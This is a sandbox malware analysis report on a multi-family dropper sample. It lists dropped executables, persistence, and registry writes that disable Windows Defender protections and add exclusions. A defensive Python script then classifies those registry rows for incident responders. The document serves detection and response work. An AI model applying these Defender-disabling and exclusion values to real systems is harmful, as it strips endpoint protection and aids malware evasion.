Malware Analysis Report

2025-01-23 11:00

Sample ID 231010-za6e6abe58
Target 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1
SHA256 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware trojan mystic lutyr magia stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1

Threat Level: Known bad

The file 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1 was found to be: Known bad.

Malicious Activity Summary


DcRat

RedLine

Windows security bypass

Glupteba payload

SmokeLoader

Healer

Mystic

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

Modifies Windows Defender Real-time Protection settings

SectopRAT

Detect Mystic stealer payload

Detects Healer, an antivirus disabler dropper

Glupteba

Amadey

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:31

Signatures

Unsigned PE

No indicator details recorded.

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:31

Reported

2023-10-10 20:46

Platform

win7-20230831-en

Max time kernel

76s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects Healer, an antivirus disabler dropper

3 matches; no indicator details recorded.

Glupteba

loader dropper glupteba

Glupteba payload

9 matches; no indicator details recorded.

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A

RedLine

infostealer redline

RedLine payload

3 matches; no indicator details recorded.

SectopRAT

trojan rat sectoprat

SectopRAT payload

2 matches; no indicator details recorded.

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2436 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8FF1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9169.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\933E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B4B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\129F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1CAE.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B4B.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
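The registry rows in the "Modifies Windows Defender Real-time Protection settings", "Windows security bypass", "Windows security modification" and "Adds Run key to start application" sections above carry the actionable part of this report, but they need sorting: the Policies\...\Real-Time Protection\Disable* = 1 values and Features\TamperProtection = 0 written by 96E7.exe switch Defender off, the Exclusions\Paths and Exclusions\Processes values written by 31839b57a4f11171d6abc8bbc4451ee4.exe carve out the paths it drops to (C:\Windows\rss, C:\Windows\windefender.exe, csrss.exe), while the wextract_cleanupN RunOnce values are the self-extractor's own "rundll32.exe advpack.dll,DelNodeRunDLL32" cleanup of each IXP00N.TMP directory (one per nested SFX layer) and not persistence; the only real Run-key persistence listed is HKCU\...\Run\csrss pointing at C:\Windows\rss\csrss.exe. The following is an added example, not code from the sandbox or from the report: it parses rows in the format printed above (copied verbatim from this report, plus one SCSI-enumeration row as a low-signal control), unescapes the values, and buckets each event by what it means to a responder. The row format regex and the category names are this example's own assumptions.

```python
"""Classify sandbox registry-event rows into Defender-tamper and persistence findings."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Sample input: rows copied from the report above (the last row, SCSI key
# enumeration, is included as a control that should land in "other").
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
"""

# Row layout assumed from the report: <op> <key path>[ = <value>] <process> <target>.
# The process column is located as the last drive-letter path that follows
# whitespace and contains no quote, so quoted values holding paths do not
# confuse it.
ROW_RE = re.compile(
    r"^(?P<op>Set value \((?:int|str|data)\)|Key (?:created|opened|queried|enumerated)|"
    r"File (?:created|opened for modification|opened \(read-only\)))\s+"
    r"(?P<body>.+?)\s+(?P<proc>[A-Za-z]:\\[^\"]+?)\s+(?P<target>\S+)$"
)


@dataclass
class RegEvent:
    op: str
    path: str
    value: Optional[str]
    process: str


def _unquote(raw: str) -> str:
    """Strip the surrounding quotes the report adds and undo its \\-escaping."""
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return re.sub(r"\\(.)", r"\1", raw[1:-1])
    return raw


def parse_row(row: str) -> Optional[RegEvent]:
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    path, sep, value = m.group("body").partition(" = ")
    return RegEvent(m.group("op"), path, _unquote(value) if sep else None, m.group("proc"))


def classify(ev: RegEvent) -> str:
    """Category names are this example's own; order matters (most specific first)."""
    p = ev.path.lower()
    v = (ev.value or "").lower()
    if "\\windows defender\\real-time protection\\disable" in p and v == "1":
        return "defender_rtp_disabled"
    if "\\windows defender\\features\\tamperprotection" in p and v == "0":
        return "defender_tamper_protection_off"
    if "\\windows defender\\exclusions\\" in p:
        return "defender_exclusion_added"
    if "\\policies\\microsoft\\windows defender" in p:
        return "defender_policy_touched"
    # wextract/IExpress schedules deletion of its IXP00N.TMP directory via RunOnce;
    # this is an artifact of the SFX chain, not attacker persistence.
    if "\\currentversion\\runonce\\" in p and "advpack.dll,delnoderundll32" in v:
        return "sfx_cleanup_runonce"
    if "\\currentversion\\run\\" in p or "\\currentversion\\runonce\\" in p:
        return "run_key_persistence"
    return "other"


def exclusion_target(ev: RegEvent) -> Optional[str]:
    """For an Exclusions\\Paths or \\Processes value, return what got excluded."""
    m = re.search(r"\\Exclusions\\(?:Paths|Processes)\\(.+)$", ev.path, re.IGNORECASE)
    return m.group(1) if m else None


def summarize(rows: str) -> dict:
    buckets = defaultdict(list)
    for row in rows.strip().splitlines():
        ev = parse_row(row)
        if ev is not None:
            buckets[classify(ev)].append(ev)
    return dict(buckets)


if __name__ == "__main__":
    for cat, evs in summarize(SAMPLE_ROWS).items():
        print(cat)
        for ev in evs:
            print("   ", ev.process.rsplit("\\", 1)[-1], "->", ev.path.rsplit("\\", 1)[-1], repr(ev.value))
```

On a live host the same three questions are the ones to ask first: does HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection exist with Disable* values set (it is absent by default on an unmanaged machine), has TamperProtection been turned off, and are there Exclusions\Paths or Exclusions\Processes entries naming directories under C:\Windows that no installer should need. A RunOnce value whose data is the advpack.dll,DelNodeRunDLL32 cleanup call is evidence that a self-extractor ran, which is useful for reconstructing the drop chain, but it should not be reported as the persistence mechanism.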

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\bcdedit.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231010204433.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
